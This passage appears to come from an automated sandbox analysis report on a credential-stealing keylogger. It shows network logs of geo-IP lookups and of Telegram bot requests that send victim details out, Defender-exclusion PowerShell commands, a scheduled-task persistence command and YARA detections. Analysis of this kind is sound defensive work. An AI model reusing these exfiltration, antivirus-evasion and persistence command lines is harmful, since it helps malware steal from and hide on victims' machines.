                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9WxnbeVWNz5qLDCsnbLAaaDdzEBu%2Fwk8EkRofKZd1SdeB%2BR5j3q8tIgppskFJQuoqlEqmXk6ik4xJpGT63BifxyCsGNXF0B%2Fbv0aMyYVYAEyUn0dkcsOs1x3aRKFtCqtpkjJISML"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e2909f888c81-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1986&rtt_var=754&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1441263&cwnd=235&unsent_bytes=0&cid=7259d04085085bca&ts=467&x=0"
                                                                                                                          2024-12-05 17:51:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.749776104.21.67.1524437728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:34 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-12-05 17:51:34 UTC882INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:34 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298517
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O%2F%2FV90x79p5R0Z6KlBXf8GZMh9%2BlrGdXacCpFaq%2Fnqhifas9zUoDVtrsRlqi1ri2S%2FxifnAp0rzeZQddmkcoOzDQJbQOdhg0AFkrTscAwPOJ4mT%2Fq9prJYLIFdJQA9y6msWzycdu"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e2913cd88ca1-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1943&rtt_var=742&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1462925&cwnd=168&unsent_bytes=0&cid=b1901960cf632c25&ts=460&x=0"
                                                                                                                          2024-12-05 17:51:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.749788104.21.67.1524437308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:37 UTC61OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2024-12-05 17:51:37 UTC886INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:37 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298520
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8bNUD6OxinE%2Fn1wSI6q86wuOJtws%2B%2F4YNjaO9JDEDVa%2BTvfu113G4YC0s%2FartTbWzaW3KLSaNepg%2Fq6%2BxZzRFaWdgeGE5beiA%2FzYVqXgx07TMo66gF88POcHFpftEqi2HClUGjjO"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e2a50b08c3eb-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1701&rtt_var=646&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1716637&cwnd=240&unsent_bytes=0&cid=00f5150b12d3090c&ts=472&x=0"
                                                                                                                          2024-12-05 17:51:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.749789104.21.67.1524437728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:37 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-12-05 17:51:38 UTC884INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:38 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298521
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FmZnS3nwPoFlQR5f2LTzs%2FKpSjCNsJ8p0QGWQ4%2BbsRa%2BfMkKGfGQIePC4yVIPs1BLIDKZzUPdDPqC0BSv1fLmPAvUZcRYShZjd%2FATu0yi%2FmbfKZzJxAt89uStM9XQ%2BLDmsZaKWqC"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e2a71d464315-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1600&rtt_var=655&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1604395&cwnd=218&unsent_bytes=0&cid=02ab645e29559b67&ts=537&x=0"
                                                                                                                          2024-12-05 17:51:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.749795149.154.167.2204437308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:39 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:28:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                          Host: api.telegram.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-12-05 17:51:39 UTC344INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:39 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 55
                                                                                                                          Connection: close
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                          2024-12-05 17:51:39 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.749799104.21.67.1524437728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:41 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-12-05 17:51:41 UTC876INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:41 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298524
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DTmBByBQQeiOfEPseT038jShTSDzPh2ZD1WupizywBFgT4KQykcsEKaOJHXYDGnoZHYCXujSwnbKPi3VWOwORCDp4VfNxzz7nspoaWv27iqEXB57C6%2BCUPxROixcIOY%2B%2FaZFmwcN"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e2bbce394372-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1587&rtt_var=606&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1788120&cwnd=242&unsent_bytes=0&cid=a8e6ca4617307fcd&ts=464&x=0"
                                                                                                                          2024-12-05 17:51:41 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.749809104.21.67.1524437728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:44 UTC61OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2024-12-05 17:51:44 UTC882INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:44 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298527
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZmPurGoo5fBMTwe6jcDfJ6zPXTE%2B3PEOrO8u%2FESrI1nHFQBVHKFh%2FNADcInEJGlgWKqiU2n3Th%2FqfNAVSv2SJ9AJcMYkWxmQFfzC0psW1zJSXuuKbZNp%2BS5qgtqL3%2BQ8KNR3wNCO"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e2d04fc6180d-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1567&rtt_var=595&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1829573&cwnd=201&unsent_bytes=0&cid=00fd72ae36522746&ts=458&x=0"
                                                                                                                          2024-12-05 17:51:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.749815149.154.167.2204437728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:46 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:17:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                          Host: api.telegram.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-12-05 17:51:46 UTC344INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:46 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 55
                                                                                                                          Connection: close
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                          2024-12-05 17:51:46 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:12:51:02
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\Ti5nuRV7y4.exe"
                                                                                                                          Imagebase:0xb20000
                                                                                                                          File size:766'976 bytes
                                                                                                                          MD5 hash:3C70DF024FF5A65F0785B0075939C3FD
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1316105655.0000000007340000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:8
                                                                                                                          Start time:12:51:06
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe"
                                                                                                                          Imagebase:0x730000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:9
                                                                                                                          Start time:12:51:06
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:10
                                                                                                                          Start time:12:51:07
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"
                                                                                                                          Imagebase:0x730000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:11
                                                                                                                          Start time:12:51:07
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp"
                                                                                                                          Imagebase:0xf30000
                                                                                                                          File size:187'904 bytes
                                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:12
                                                                                                                          Start time:12:51:07
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:13
                                                                                                                          Start time:12:51:07
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:14
                                                                                                                          Start time:12:51:07
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\Ti5nuRV7y4.exe"
                                                                                                                          Imagebase:0xc40000
                                                                                                                          File size:766'976 bytes
                                                                                                                          MD5 hash:3C70DF024FF5A65F0785B0075939C3FD
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3699461711.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
